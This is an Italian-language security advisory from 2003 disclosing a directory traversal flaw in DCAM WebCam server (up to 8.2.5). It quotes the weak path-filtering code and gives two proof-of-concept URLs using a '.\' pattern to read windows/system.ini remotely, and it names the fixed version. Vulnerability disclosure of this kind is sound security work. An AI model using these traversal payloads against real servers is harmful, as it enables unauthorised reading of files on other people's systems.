####################################################################### Luigi Auriemma Applicazione: DCAM WebCam server http://www.hyperionx.com http://sourceforge.net/projects/dcamserver/ Versioni: <= 8.2.5 Piattaforme: Windows Bug: Directory traversal bug Exploitation: remoto via browser Data: 22 Dec 2003 Autore: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduzione 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduzione =============== DCAM WebCam Sever e' un programma OpenSource scritto in VisualBasic che permette di catturare uno streaming video in tempo reale e di condividerlo sul web attraverso il webserver incorporato. ####################################################################### ====== 2) Bug ====== Il webserver all'interno di DCAM effettua dei controlli onde evitare il directory traversal bug. Tali controlli si possono vedere in Form1.frm: ... 880 page = Replace(page, "..", "") 881 page = Replace(page, "./", "") 882 page = Replace(page, "/.", "") 883 page = Replace(page, "//", "") 884 page = Replace(page, "\", "") ... Il problema avviene quando l'attacker usa il pattern ".\" che inganna i controlli e gli permette di vedere e scaricare qualsiasi file presente sul sistema remoto conoscendone il path. ####################################################################### =========== 3) The Code =========== http://server/.\.\.\.\/windows/system.ini http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini ####################################################################### ====== 4) Fix ====== Versione 8.2.6 #######################################################################